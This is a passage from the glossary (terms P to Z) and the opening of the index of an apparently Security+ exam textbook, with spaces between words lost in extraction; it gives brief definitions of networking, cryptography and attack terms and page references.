PTZSeepan-tilt-zoom.
publickeycryptographySeeasymmetricencryption.
publickeyinfrastructure(PKI)Infrastructureforbindingapublickeytoaknownuserthroughatrustedintermediary,typicallyacertificateauthority.
qualitativeriskassessmentTheprocessofsubjectivelydeterminingtheimpactofaneventthataffectsaproject,program,orbusiness.Itinvolvestheuseofexpertjudgment,experience,orgroupconsensustocompletetheassessment.
quantitativeriskassessmentTheprocessofobjectivelydeterminingtheimpactofaneventthataffectsaproject,program,orbusiness.Itusuallyinvolvestheuseofmetricsandmodelstocompletetheassessment.
RADIUSRemoteAuthenticationDial-InUserService,astandardprotocolforprovidingauthenticationservices.Itiscommonlyusedindial-up,wireless,andPPPenvironments.
RAIDSeeRedundantArrayofIndependentDisks.
ransomwareMalwarethatencryptssensitivefilesandofferstheirreturnforaransom.
rapidapplicationdevelopment(RAD)Asoftwaredevelopmentmethodologythatfavorstheuseofrapidprototypesandchangesasopposedtoextensiveadvancedplanning.
RASSeeRemoteAccessService/Server.
RBACSeerule-basedaccesscontrolorrole-basedaccesscontrol.
RC4streamcipherAstreamcipherusedinTLSandWEP.
Real-timeBlackholeList(RBL)AsystemthatusesDNSinformationtodetectanddumpspame-mails.
Real-timeTransportProtocol(RTP)AprotocolforastandardizedpacketformatusedtocarryaudioandvideotrafficoverIPnetworks.
RecoveryAgent(RA)InMicrosoftWindowsenvironments,theentityauthorizedbythesystemtouseapublickeyrecoverycertificatetodecryptotherusers’filesusingaspecialprivatekeyfunctionassociatedwiththeEncryptingFileSystem(EFS).
recoverypointobjective(RPO)Theamountofdatathatabusinessiswillingtoplaceatrisk.Itisdeterminedbytheamountoftimeabusinesshastorestoreaprocessbeforeanunacceptableamountofdatalossresultsfromadisruption.
recoverytimeobjective(RTO)Theamountoftimeabusinesshastorestoreaprocessbeforeunacceptableoutcomesresultfromadisruption.
RedundantArrayofIndependentDisks(RAID)Theuseofanarrayof
disksarrangedinasingleunitofstorageforincreasingstoragecapacity,redundancy,andperformancecharacteristics.FormerlyknownasRedundantArrayofInexpensivedisks.
referencemonitorAnon-bypassableelementofthekernelthatprocessesandenforcesallsecurityinteractionsincludingsubjectobjectaccesses.
registrationauthority(RA)ThepartyinthePKIprocessthatestablishesidentityfortheCertificateAuthoritytoissueacertificate.
RemoteAccessServer/Service(RAS)Acombinationofhardwareandsoftwareusedtoenableremoteaccesstoanetwork.
RemoteAccessTrojan(RAT)Aformofmalwaredesignedtoenableremoteaccesstoasystembyanunauthorizedparty.
replayattackAnattackwheredataisreplayedthroughasystemtoreproduceaseriesoftransactions.
repudiationTheactofdenyingthatamessagewaseithersentorreceived.
reversesocialengineeringAsocialengineeringattackpatternwheretheattackerprepositionsthemselvestobethepersonyoucallwhenyouthinkyouareattacked.Becauseyoucallthem,yourleveloftrustislower.
residualriskRisksremainingafteraniterationofriskmanagement.
RingpolicyPartoftheBibasecuritymodel,apolicythatallowsanysubjecttoreadanyobjectwithoutregardtotheobject’slevelofintegrityandwithoutloweringthesubject’sintegritylevel.
RIPEMDAhashfunctiondevelopedinBelgium.TheacronymexpandstoRACEIntegrityPrimitivesEvaluationMessageDigest,butthisnameis
rarelyused.ThecurrentversionisRIPEMD-160.
riskThepossibilityofsufferingaloss.
riskassessmentorriskanalysisTheprocessofanalyzinganenvironmenttoidentifythethreats,vulnerabilities,andmitigatingactionstodetermine(eitherquantitativelyorqualitatively)theimpactofaneventaffectingaproject,program,orbusiness.
riskmanagementOveralldecision-makingprocessofidentifyingthreatsandvulnerabilitiesandtheirpotentialimpacts,determiningthecoststomitigatesuchevents,anddecidingwhatactionsarecosteffectivetotaketocontroltheserisks.
Rivest,Shamir,Adleman(RSA)Thenamesofthethreemenwhodevelopedapublickeycryptographicsystemandthecompanytheyfoundedtocommercializethesystem.
rogueaccesspointAnunauthorizedaccesspointinsertedintoanetworkallowingunauthorizedwirelessaccess.
role-basedaccesscontrol(RBAC)Anaccesscontrolmechanisminwhich,insteadoftheusersbeingassignedspecificaccesspermissionsfortheobjectsassociatedwiththecomputersystemornetwork,asetofrolesthattheusermayperformisassignedtoeachuser.
rootkitAformofmalwarethatmodifiestheOSinasystemtochangethebehaviorofthesystem.
routerAnetworkdevicethatoperatesatthenetworklayeroftheOSImodel.
RTPSeeReal-timeTransportProtocol.
rule-basedaccesscontrol(RBAC)Anaccesscontrolmechanismbased
onrules.
runlevelsInUNIXandLinuxsystems,runlevelsindicatethetypeofstatethesystemisin,from0(halted)to6(rebooting).Lowerrunlevelsindicatemaintenanceconditionswithfewerservicesrunning,higherrunlevelsarenormaloperatingconditions.EachUNIXvariantemploystheconceptinthesamemanner,butthespecificsforeachrunlevelcandiffer.
safeguardSeecontrol.
SafeHarborAseriesofprovisionstomanagethedifferentprivacypoliciesbetweentheUSandEUwhenitcomestodatasharing.
SANSeestorageareanetwork.
sandboxingTheconceptofisolatingasystemandspecificprocessesformtheOSinordertoprovidespecificlevelsofsecurity.
SCADASeesupervisorycontrolanddataacquisition.
SCEPSeeSimpleCertificateEnrollmentProtocol.
scriptkiddieAhackerwithlittletruetechnicalskillandhencewhousesonlyscriptsthatsomeoneelsedeveloped.
SecureCopyProtocol(SCP)Anetworkprotocolthatsupportssecurefiletransfers.
SecureDevelopmentLifecycle(SDL)modelAprocessmodeltoincludesecurityfunctionconsiderationaspartofthebuildprocessofsoftwareinanefforttoreduceattacksurfacesandvulnerabilities.
SecureFTPAmethodofsecurefiletransferthatinvolvesthetunnelingofFTPthroughanSSHconnection.ThisisdifferentthanSFTP.See
SecureShellFileTransferProtocol.
SecureHashAlgorithm(SHA)Ahashalgorithmusedtohashblockdata.ThefirstversionisSHA1,withsubsequentversionsdetailinghashdigestlength:SHA256,SHA384,andSHA512.
SecureHypertextTransferProtocol(SHTTP)AnalternativetoHTTPS,inwhichonlythetransmittedpagesandPOSTfieldsareencrypted.Renderedmoot,byandlarge,bywidespreadadoptionofHTTPS.
SecureKeyExchangeMechanismforInternet(SKEMI)AprotocolandstandardforthekeyexchangeacrosstheInternet.
Secure/MultipurposeInternetMailExtensions(S/MIME)AnencryptedimplementationoftheMIME(MultipurposeInternetMailExtensions)protocolspecification.
SecureShell(SSH)Asetofprotocolsforestablishingasecureremoteconnectiontoacomputer.Thisprotocolrequiresaclientoneachendoftheconnectionandcanuseavarietyofencryptionprotocols.
SecureShellFileTransferProtocol(SFTP)AsecurefiletransfersubsystemassociatedwiththeSecureShell(SSH)protocol.
SecureSocketsLayer(SSL)AnencryptinglayerbetweenthesessionandtransportlayersoftheOSImodeldesignedtoencryptabovethetransportlayer,enablingsecuresessionsbetweenhosts.
SecurityAssertionMarkupLanguage(SAML)AnXML-basedstandardforexchangingauthenticationandauthorizationdata.
securityassociation(SA)Aninstanceofsecuritypolicyandkeyingmaterialappliedtoaspecificdataflow.BothIKEandIPsecuseSAs,althoughtheseSAsareindependentofoneanother.IPsecSAsare
unidirectionalandareuniqueineachsecurityprotocol,whereasIKESAsarebidirectional.AsetofSAsisneededforaprotecteddatapipe,oneSAperdirectionperprotocol.SAsareuniquelyidentifiedbydestination(IPsecendpoint)address,securityprotocol(AHorESP),andsecurityparameterindex(SPI).
securitybaselineTheendresultoftheprocessofestablishinganinformationsystem’ssecuritystate.Itisaknowngoodconfigurationresistanttoattacksandinformationtheft.
SecurityContentAutomationProtocol(SCAP)Amethodofusingspecificprotocolsanddataexchangestoautomatethedeterminationofvulnerabilitymanagement,measurement,andpolicycomplianceacrossasystemorsetofsystems.
securitycontrolsAgroupoftechnical,management,oroperationalpoliciesandproceduresdesignedtoimplementspecificsecurityfunctionality.Accesscontrolsareanexampleofasecuritycontrol.
securityinformationeventmanagement(SIEM)Thenameusedforabroadrangeoftechnologicalsolutionstothecollectionandanalysisofsecurity-relatedinformationacrosstheenterprise.
securitykernelSeereferencemonitor.
securitythroughobscurityAnapproachtosecurityusingthemechanismofhidinginformationtoprotectit.
separation(orsegregation)ofdutiesAbasiccontrolthatpreventsordetectserrorsandirregularitiesbyassigningresponsibilitiestodifferentindividualssothatnosingleindividualcancommitfraudulentormaliciousactions.
SenderPolicyFramework(SPF)Ane-mailverificationsystemdesignedtodetectspoofede-mailaddresses.
sequencenumberAnumberwithinaTCPpackettomaintainTCPconnectionsandconversationintegrity.
server-sidescriptingTheprocessingofscriptsontheserversideofanInternetconnectiontopreventclienttamperingwiththeprocess.
servicelevelagreement(SLA)Anagreementbetweenpartiesconcerningtheexpectedorcontracteduptimeassociatedwithasystem.
servicesetidentifier(SSID)Identifiesaspecific802.11wirelessnetwork.Ittransmitsinformationabouttheaccesspointtowhichthewirelessclientisconnecting.
shadowfileThefilethatstorestheencryptedpasswordinasystem.
shieldedtwisted-pair(STP)Aphysicalnetworkconnectionconsistingoftwowirestwistedandcoveredwithashieldtopreventinterference.
shiftcipherAcipherthatoperatesbysubstitution,thereplacementofonecharacterforanother.
ShortMessageService(SMS)Aformoftextmessagingoverphoneandmobilephonecircuitsthatallowsupto160-charactermessagestobecarriedoversignalingchannels.
shouldersurfingAtechniquefromsocialengineeringwhereyouobserveanother’saction,suchasapasswordentry.
signaturedatabaseAcollectionofactivitypatternsthathavealreadybeenidentifiedandcategorizedandthattypicallyindicatesuspiciousormaliciousactivity.
SimpleCertificateEnrollmentProtocol(SCEP)Aprotocolusedinpublickeyinfrastructure(PKI)forenrollmentandotherservices.
SimpleMailTransferProtocol(SMTP)ThestandardInternetprotocolusedtotransfere-mailbetweenhosts.
SimpleNetworkManagementProtocol(SNMP)Astandardprotocolusedtomanagenetworkdevicesacrossanetworkremotely.
SimpleObjectAccessProtocol(SOAP)AnXML-basedspecificationforexchanginginformationassociatedwithwebservices.
SimpleSecurityRuleTheprinciplethatstatescomplexitymakessecuritymoredifficultandhencevaluessimplicity.
singlelossexpectancy(SLE)Monetarylossorimpactofeachoccurrenceofathreat.SLE=assetvalue×exposurefactor.
singlesign-on(SSO)AnauthenticationprocessbywhichtheusercanenterasingleuserIDandpasswordandthenmovefromapplicationtoapplicationorresourcetoresourcewithouthavingtosupplyfurtherauthenticationinformation.
slackspaceUnusedspaceonadiskdrivecreatedwhenafileissmallerthantheallocatedunitofstorage(suchasasector).
smartcardsAtokenwithachiptostorecryptographictokens.Becauseofthenatureofsmartcards,theyarenearlyimpossibletocopyorcounterfeit.
SMSSeeShortMessageService.
smurfattackAmethodofgeneratingsignificantnumbersofpacketsforaDoSattack.
snifferAsoftwareorhardwaredeviceusedtoobservenetworktrafficasitpassesthroughanetworkonasharedbroadcastmedia.
sniffingTheuseofasoftwareorhardwaredevice(sniffer)toobservenetworktrafficasitpassesthroughanetworkonasharedbroadcastmedia.
socialengineeringTheartofdeceivinganotherpersonsothatheorsherevealsconfidentialinformation.Thisisoftenaccomplishedbyposingasanindividualwhoshouldbeentitledtohaveaccesstotheinformation.
SoftwareasaService(SaaS)Theprovisioningofsoftwareasaservice,commonlyknownason-demandsoftware.
softwaredevelopmentlifecyclemodel(SDLC)Theprocessesandproceduresemployedtodevelopsoftware.Sometimesalsocalledsecuredevelopmentlifecyclemodelwhensecurityispartofthedevelopmentprocess.
solid-statedrive(SSD)Amassstoragedevice,suchasaharddrive,thatiscomposedofelectronicmemoryasopposedtoaphysicaldeviceofspinningplatters.
SONETSeeSynchronousOpticalNetworkTechnologies.
spamE-mailthatisnotrequestedbytherecipientandistypicallyofacommercialnature.Alsoknownasunsolicitedcommerciale-mail(UCE).
spamfilterAsecurityappliancedesignedtoremovespamatthenetworklayerbeforeitenterse-mailservers.
spearphishingAformoftargetedphishingwherespecificinformationisincludedtoconvincetherecipientthatthecommunicationisgenuine.
spimSpamsentoveraninstantmessagingchannel.
spoofingMakingdataappeartohaveoriginatedfromanothersourcesoastohidethetrueoriginfromtherecipient.
spywareMalwaredesignedtospyonause,typicallyrecordinginformationsuchaskeystrokesforpasswords.
SQLinjectionAnattackagainstaSQLengineparserdesignedtoperformunauthorizeddatabaseactivities.
SSDSeesolid-statedrive.
SSLstrippingattackAspecifictypeofman-in-the-middleattackagainstSSL.
steganographyTheuseofcryptographytohidecommunications.
storageareanetwork(SAN)Atechnology-basedstoragesolutionconsistingofnetworkattachedstorage.
STPSeeshieldedtwisted-pair.
streamcipherAnencryptionprocessusedagainstastreamofinformation,evenbitbybit,asopposedtooperationsperformedonblocks.
StructuredExceptionHandler(SEH)TheprocessusedtohandleexceptionsintheWindowsOScorefunctions.
StructuredQueryLanguage(SQL)Alanguageusedinrelationaldatabasequeries.
structuredthreatAthreatthathasreasonablefinancialbackingandcanlastforafewdaysormore.Theorganizationalelementsallowforgreatertimetopenetrateandattackasystem.
StructuredThreatInformationeXpression(STIX)AstandardXMLschemafordescribingandexchangingthreatinformation.
subnetmaskTheinformationthattellsadevicehowtointerpretthenetworkandhostportionsofanIPaddress.
subnettingThecreationofanetworkwithinanetworkbymanipulatinghowanIPaddressissplitintonetworkandhostportions.
SubscriberIdentityModule(SIM)AnintegratedcircuitorhardwareelementthatsecurelystorestheInternationalMobileSubscriberIdentity(IMSI)andtherelatedkeyusedtoidentifyandauthenticatesubscribersonmobiletelephones.
substitutionTheswitchingofonevalueforanotherincryptography.
supervisorycontrolanddataacquisition(SCADA)Agenerictermusedtodescribetheindustrialcontrolsystemnetworksusedtointerconnectinfrastructureelements(suchasmanufacturingplants,oilandgaspipelines,powergenerationanddistributionsystems,andsoon)andcomputersystems.
switchAnetworkdevicethatoperatesatthedatalayeroftheOSImodel.
switchedportanalyzer(SPAN)Atechnologyemployedthatcanduplicateindividualchannelscrossingaswitchtoanothercircuit.
symmetricencryptionEncryptionthatneedsallpartiestohaveacopyofthekey,sometimescalledasharedsecret.Thesinglekeyisusedforbothencryptionanddecryption.
SYNfloodAmethodofperformingDoSbyexhaustingTCPconnectionresourcesthroughpartiallyopeningconnectionsandlettingthemtime-out.
SynchronousOpticalNetworkTechnologies(SONET)Asetofstandardsusedfordatatransfersoveropticalnetworks.
systematicriskAformofriskthatcanbemanagedbydiversification.
tangibleassetAnassetforwhichamonetaryequivalentcanbedetermined.Examplesareinventory,buildings,cash,hardware,software,andsoon.
TCPwrappersAhost-basednetworkingACLsystem,usedinsomeLinuxsystemstofilternetworkaccesstoInternetProtocolservers.
TCP/IPhijackingAnattackwheretheattackerinterceptsandhijacksanestablishedTCPconnection.
TelnetAnetworkprotocolusedtoprovidecleartextbidirectionalcommunicationoverTCP.
TEMPESTTheU.S.military’snameforthefieldassociatedwithelectromagneticeavesdroppingonsignalsemittedbyelectronicequipment.SeealsoVanEckphenomenon.
TemporalKeyIntegrityProtocol(TKIP)Asecurityprotocolusedin802.11wirelessnetworks.
TerminalAccessControllerAccessControlSystem+(TACACS+)AremoteauthenticationsystemthatusestheTACACS+protocol,definedinRFC1492,andTCPport49.
threatAnycircumstanceoreventwiththepotentialtocauseharmtoanasset.
threatactorThepartybehindathreat,althoughitmaybeanon-personasinanenvironmentalissue.
threatvectorThemethodbywhichathreatactorintroducesaspecificthreat.
three-wayhandshakeAmeansofensuringinformationtransferencethroughathree-stepdataexchange.UsedtoinitiateaTCPconnection.
ticket-grantingserver(TGS)AportionoftheKerberosauthenticationsystem.
ticket-grantingticket(TGT)ApartoftheKerberosauthenticationsystemthatisusedtoproveidentitywhenrequestingservicetickets.
Time-basedOne-TimePassword(TOTP)Apasswordthatisusedonceandisonlyvalidduringaspecifictimeperiod.
timebombAformoflogicbombinwhichthetriggeringeventisadateorspecifictime.Seealsologicbomb.
TKIPSeeTemporalKeyIntegrityProtocol.
tokenAhardwaredevicethatcanbeusedinachallenge-responseauthenticationprocess.
TransactionSignature(TSIG)AprotocolusedasameansofauthenticatingdynamicDNSrecordsduringDNSupdates.
TransmissionControlProtocol(TCP)Theconnection-orientedtransportlayerprotocolforuseontheInternetthatallowspacket-leveltrackingofaconversation.
TransportLayerSecurity(TLS)AnewerformofSSLthatisnowanInternetstandard.
transpositionTherearrangementofcharactersbypositionaspartofcryptographicoperations.
trapdoorSeebackdoor.
TrivialFileTransferProtocol(TFTP)AsimplifiedversionofFTPusedforlow-overheadfiletransfersusingUDPport69.
TrojanAformofmaliciouscodethatappearstoprovideoneservice(andmayindeedprovidethatservice)butthatalsohidesanotherpurpose.Thishiddenpurposeoftenhasamaliciousintent.ThiscodemayalsobereferredtoasaTrojanhorse.
trunkingTheprocessofspanningasingleVLANacrossmultipleswitches.
TrustedAutomatedeXchangeofIndicatorInformation(TAXII)AnXMLschemafortheautomatedexchangeofcyberindicatorsbetweentrustedparties.
TrustedOSAnOSthatcanprovideappropriatelevelsofsecurityandhasmechanismstoprovideassuranceofsecurityfunction.
TrustedPlatformModule(TPM)Ahardwarechiptoenabletrustedcomputingplatformoperations.
tunnelingTheprocessofpackagingpacketssothattheycantraverseanetworkinasecure,confidentialmanner.
UnifiedExtensibleFirmwareInterface(UEFI)AspecificationthatdefinestheinterfacebetweenanOSandthehardwarefirmware.ThisisareplacementtoBIOS.
unifiedthreatmanagement(UTM)Theaggregationofmultiplenetworksecurityproductsintoasingleapplianceforefficiencypurposes.
UniformResourceIdentifier(URI)Asetofcharactersusedtoidentifythenameofaresourceinacomputersystem.AURLisaformofURI.
UniformResourceLocator(URL)AspecificcharacterstringusedtopointtoaspecificitemacrosstheInternet.
uninterruptiblepowersupply(UPS)Asourceofpower(generallya
battery)designedtoprovideuninterruptedpowertoacomputersystemintheeventofatemporarylossofpower.
UniversalSerialBus(USB)Anindustry-standardprotocolforcommunicationoveracabletoperipheralsviaastandardsetofconnectors.
unshieldedtwisted-pair(UTP)Aformofnetworkcablinginwhichpairsofwiresaretwistedtoreducecrosstalk.CommonlyusedinLANs.
unstructuredthreatAthreatthathasnosignificantresourcesorability—typicallyanindividualwithlimitedskill.
unsystematicriskRiskthatcannotbemitigatedbydiversification.Unsystematicriskscanresultinlossacrossalltypesofriskcontrols.
usageauditingTheprocessofrecordingwhodidwhatandwhenonaninformationsystem.
useracceptancetesting(UAT)Theapplicationofacceptance-testingcriteriatodeterminefitnessforuseaccordingtoend-userrequirements.
UserDatagramProtocol(UDP)AprotocolintheTCP/IPprotocolsuiteforthetransportlayerthatdoesnotsequencepackets—itis“fireandforget”innature.
userIDAuniquealphanumericidentifierthatidentifiesindividualswhenloggingintooraccessingasystem.
UTPSeeunshieldedtwisted-pair.
vampiretapAtapthatconnectstoanetworklinewithoutcuttingtheconnection.
VanEckphenomenonElectromagneticeavesdroppingthroughthe
interceptionofelectronicsignalsemittedbyelectricalequipment.SeealsoTempest.
videoteleconferencing(VTC)Abusinessprocessofusingvideosignalstocarryaudioandvisualsignalsbetweenseparatelocations,thusallowingparticipantstomeetviaavirtualmeetinginsteadoftravelingtoaphysicallocation.Modernvideoconferencingequipmentcanprovideveryrealisticconnectivitywhenlightingandbackgroundsarecontrolled.
VigenèrecipherApolyalphabeticsubstitutioncipherthatdependsonapassword.
virtuallocalareanetwork(VLAN)Abroadcastdomaininsideaswitchedsystem.
virtualprivatenetwork(VPN)Anencryptednetworkconnectionacrossanothernetwork,offeringaprivatecommunicationchannelacrossapublicmedium.
virtualizationdesktopinfrastructure(VDI)Theuseofserverstohostvirtualdesktopsbymovingtheprocessingtotheserverandusingthedesktopmachineasmerelyadisplayterminal.VDIoffersoperatingefficienciesaswellascostandsecuritybenefits.
virusAformofmaliciouscodeorsoftwarethatattachesitselftootherpiecesofcodeinordertoreplicate.Virusesmaycontainapayload,whichisaportionofthecodethatisdesignedtoexecutewhenacertainconditionismet(suchasonacertaindate).Thispayloadisoftenmaliciousinnature.
vishingPhishingovervoicecircuits,specificallyvoiceoverIP(VoIP).
voiceoverIP(VoIP)Thepacketizedtransmissionofvoicesignals(telephony)overInternetProtocol.
vulnerabilityAweaknessinanassetthatcanbeexploitedbyathreattocauseharm.
WAPSeeWirelessApplicationProtocol.
war-dialingAnattacker’sattempttogainunauthorizedaccesstoacomputersystemornetworkbydiscoveringunprotectedconnectionstothesystemthroughthetelephonesystemandmodems.
war-drivingTheattemptbyanattackertodiscoverunprotectedwirelessnetworksbywandering(ordriving)aroundwithawirelessdevice,lookingforavailablewirelessaccesspoints.
warmsiteAbackupsite,offpremises,thathashardwarebutisnotconfiguredwithdataandwilltakesometimetoswitchoverto.
WassenaarArrangementAsetofrulesandregulationsconcerningdual-usetechnologies,includingcryptography.Theserulesarerelatedtoarmstradingandsimilarnationalsecurityconcernsandimpactsomecybersecurityelements.
webapplicationfirewall(WAF)Afirewallthatoperatesattheapplicationlevel,specificallydesignedtoprotectwebapplicationsbyexaminingrequestsattheapplicationstacklevel.
WEPSeeWiredEquivalentPrivacy.
whalingThetargetingofhigh-valueindividuals.
whiteboxtestingAformoftestingwherethetesterhasknowledgeoftheinnerworkingsofasystem.
whitelistingAlistingofitemstobeallowedbyspecificinclusion.Theoppositeofblacklisting.
wideareanetwork(WAN)Anetworkthatspansalargegeographicregion.
Wi-FiProtectedAccess(WPA/WPA2)Aprotocoltosecurewirelesscommunicationsusingasubsetofthe802.11istandard.
Wi-FiProtectedSetup(WPS)Anetworksecuritystandardthatallowseasysetupofawirelesshomenetwork.
WiredEquivalentPrivacy(WEP)Theencryptionschemeusedtoattempttoprovideconfidentialityanddataintegrityon802.11networks.
wirelessaccesspoint(WAP)Anetworkaccessdevicethatfacilitatestheconnectionofwirelessdevicestoanetwork.
WirelessApplicationProtocol(WAP)Aprotocolfortransmittingdatatosmallhandhelddevicessuchascellularphones.
wirelessintrusiondetectionsystem(WIDS)Anintrusiondetectionsystemestablishedtocoverawirelessnetwork.
wirelessintrusionpreventionsystem(WIPS)Anintrusionpreventionsystemestablishedtocoverawirelessnetwork.
WirelessTransportLayerSecurity(WTLS)TheencryptionprotocolusedonWAPnetworks.
wormAnindependentpieceofmaliciouscodeorsoftwarethatself-replicates.Unlikeavirus,itdoesnotneedtobeattachedtoanotherpieceofcode.Awormreplicatesbybreakingintoanothersystemandmakingacopyofitselfonthisnewsystem.Awormcancontainadestructivepayloadbutdoesnothaveto.
writeblockerAspecificinterfaceforastoragemediathatdoesnotpermitwritingtooccurtothedevice.Thisallowscopiestobemade
withoutalteringthedevice.
X.500ThestandardformatfordirectoryservicesincludingLDAP.
X.509Thestandardformatfordigitalcertificates.
XMLSeeExtensibleMarkupLanguage.
XSRFSeecross-siterequestforgery.
XSSSeecross-sitescripting.
zero-dayAnamegiventoavulnerabilitywhoseexistenceisknown,butnottothedeveloperofthesoftware,henceitcanbeexploitedbeforepatchesaredevelopedandreleased.
zombieAmachinethatisatleastpartiallyunderthecontrolofabotnet.
INDEX
Pleasenotethatindexlinkspointtopagebeginningsfromtheprintedition.Locationsareapproximateine-readers,andyoumayneedtopagedownoneormoretimesafterclickingalinktogettotheindexedmaterial.
Symbols*-property(starproperty),enforcedbyBell-LaPadula,34–35
Numbers1Gmobilenetworks,3392.4GHzband,Bluetooth,3442Gmobilenetworks,3393DES(TripleDES)
databaseencryption,123IPsecusing,327overviewof,104–105SSHand,322supportedbyWTLS,340usedforSSL/TLSencryption,533
3Gmobilenetworks,339,3424Gmobilenetworks
comparingwith3GandLTE,342
featuresof,339overviewof,343
5GHzband,IEEE802.11a,348–349
AAAA(authentication,authorization,andaccounting)
Diameter,314overviewof,305RADIUS(RemoteAuthenticationDial-InUserService),312–314TACAS+(TerminalAccessControllerAccessControlSystem+),314–317
AACS(AdvancedAccessContentSystem),122ABAC(attribute-basedaccesscontrol),303–304acceptableusepolicy(AUP)
BYODconcerns,369humanresourcespolicies,49–50
accesscontrolABAC(attribute-basedaccesscontrol),303–304accountandpasswordexpirationand,297authenticationand,32authenticationcomparedwith,311CompTIASecurity+ExamObjectives,752–753DAC(discretionaryaccesscontrol),302deviceconfiguration,442–443electronicaccesscontrolsystems,197–198GroupPolicy,32–33GroupPolicyblockingdeviceaccess,451–452isolationofsystem,13MAC(mandatoryaccesscontrol),301mobiledevicesecurityand,365–366
networkaccesscontrol,267–268overviewof,31–32passwordpolicy,33physicalsecurityand,61–63,196RBAC(role-basedaccesscontrol),303remoteaccessand,311rule-basedaccesscontrol,303
accesscontrollists.SeeACLs(accesscontrollists)accesscontrolmatrix,300–301accesspoints.SeeAPs(accesspoints)accesstokens
biometrics,211–213falsepositivesandfalsenegatives,213–214somethingyouhave,210
accounting,configurationstatusaccounting,640accounting,inAAAprocess
overviewof,305RADIUS(RemoteAuthenticationDial-InUserService),314TACAS+(TerminalAccessControllerAccessControlSystem+),317
accountsadministrative.SeeadministratorscontrollingUNIXaccounts,418expiration,297,304generic,290group.Seegroupslogonrestrictions(timeofday),295user.Seeusers/useraccounts
ACKpackets,inTCPthree-wayhandshake,228–229ACLs(accesscontrollists)
dealingwithunauthorizedaccess,282formachinesecurity,441
mechanismsfirewallsarebasedon,262overviewof,300–301routersusing,259
ACM(AssociationforComputingMachinery),codeofethics,48ACs(AttributeCertificates),169–170ActiveServerPages(ASP),547activevs.passivetools,402–403ActiveX,545–546Adams,Carlisle,105–106add-ons,malicious,551AdditionalDecryptionKey(ADK),inPGP,521AddressResolutionProtocol(ARP)
ARPattacks.SeeARPpoisoningfindingMACaddresses,233–234
addressspaceclassesof,237comparingIPv4andIPv6,232private,237
ADK(AdditionalDecryptionKey),inPGP,521Adleman,Leonard,110–111administrativelaw,698administrators
backupsaskeyresponsibilityof,591functionsof,453specialuseraccounts,290
Administratorsgroup,291AdvancedAccessContentSystem(AACS),122AdvancedEncryptionStandard.SeeAES(AdvancedEncryptionStandard)AdvancedMobilePhoneSystem(AMPS),339advancedpersistentthreats.SeeAPTs(advancedpersistentthreats)adware,471–472
AES(AdvancedEncryptionStandard)databaseencryption,123filesystemencryption,123overviewof,105S/MIMEand,178SSHand,322supportinWPA2,354
affinitygroupings,toolsforriskmanagement,625agilemodel,forsoftwaredevelopment,559AH(AuthenticationHeader)
inIPsec,182–183fortrafficsecurity,327–329
AIM(AOLInstantMessenger),522airconditioning.SeeHVAC(heating,ventilation,andairconditioning)alarms,inphysicalsecurity,199–200ALE(annualizedlossexpectancy)
incalculatingrisks,622–624defined,611
alerts,regardingnewthreatsandsecuritytrends,57–58algorithms
asymmetric.Seeasymmetricencryptioncomparativestrengthandperformanceof,93incontemporaryencryption,96–97hashingfunctions.Seehashingalgorithmskeymanagement,98randomnumbersin,98symmetric.SeesymmetricencryptionusedinPGP,181usesof,116–117
AMPS(AdvancedMobilePhoneSystem),339analysisengine
decisiontreesusedby,390inHIDSs,389inIDSs,379inNIDSs,384
analysisphase,computerforensics,684AndroidOS,hardening,456annualizedlossexpectancy(ALE)
incalculatingrisks,622–624defined,611
annualizedrateofoccurrence(ARO)incalculatingrisks,623–624defined,611
anomalydetectionmodel,IDSmodels,379–380anonymity,wirelessattacksand,351anonymizingproxy,270anonymousFTP(blindFTP),540antennas
placement,360–361types,359–360
antimalwareproductsoverviewof,426–427polymorphicmalwareavoidingdetection,469
antispamproducts,430–431antispywareproducts,431–432antivirus(AV)products
BYODconcerns,367hosthardening,427–430malwaredefenses,473
AOLInstantMessenger(AIM),522APIs(applicationprogramminginterfaces),132AppSandbox,hardeningMacOSX,422
AppleApplicationfirewall,422AppleTalkprotocol,224appliances,inNIDSs,384applicationcontrol,integratedintohost-basedIPS,394applicationfirewalls,458applicationlayerproxies,262–263applicationprogramminginterfaces(APIs),132applicationvulnerabilityscanners,449applications.Seealsosoftware
application-levelattacks,473–474,572blacklisting,430,434,515CompTIASecurity+ExamObjectives,749–752configurationbaseline,579cryptographic,122–123mobileapplicationsecurity,370–372patchmanagement,579programviruses,467updates,426vulnerabilities,474webapplicationvulnerabilities,552–553whitelisting,371,434
applications,hardeningconfigurationbaseline,444hostsoftwarebaselines,448–449overviewof,444patchmanagement,445–448patches,444–445softwaredevelopmentand,578–579
AppLocker,foruseraccountcontrol,434–435APs(accesspoints)
attackson,351
IEEE802.11and,349–350rogueaccesspoints,82,352–353
APTs(advancedpersistentthreats)incurrentthreatenvironment,5modelof,654RATs(remoteaccesstrojans)and,496signsof,495stepsinmaintainingapresenceonnetwork,653
architecturesBYODconcerns,369network,221–222
ARL(authorityrevocationlist),142ARO(annualizedrateofoccurrence)
incalculatingrisks,623–624defined,611
ARP(AddressResolutionProtocol)ARPattacks,234findingMACaddresses,233–234
ARPpoisoningattacksonswitches,258overviewof,490typesofARPattacks,234
ASA(AttackSurfaceAnalyzer),hardeningWindowsOSs,416–417ASCII,canonicalformand,570Asianprivacylaws,729–730ASP(ActiveServerPages),547ASP.NET,547assertionservice,XKMS,178assets
defined,610identifyinginriskmanagementmodel,616
AssociationforComputingMachinery(ACM),codeofethics,48association,inIEEE802.11AP,349associative(realorphysical)evidence,676assurance,92asymmetricencryption.Seealsobyindividualasymmetricalgorithms
DH(Diffie-Hellman),109–110ECC(Ellipticcurvecryptography),112–113ElGamal,111–112howPGPworks,180overviewof,109–110inPGPsuite,122–123RSA(Rivest,Shamir,andAdleman),110–111tokensand,297vs.symmetric,113
ATM(AsynchronousTransferMode)cells,225networkprotocol,224tunneling,246–247
attachments,e-mailasattackvector,577MIMEhandling,508–509
AttackSurfaceAnalyzer(ASA),hardeningWindowsOSs,416–417attacks.Seealsobyindividualtypes;threats
onaddresssystem(IPaddresses),487–488adware,471–472APT(advancedpersistentthreat),495attacksurfaceareaminimization,560–561auditingand,497–499avenuesof,465–466backdoorsandtrapdoors,472–473botnets,471–472
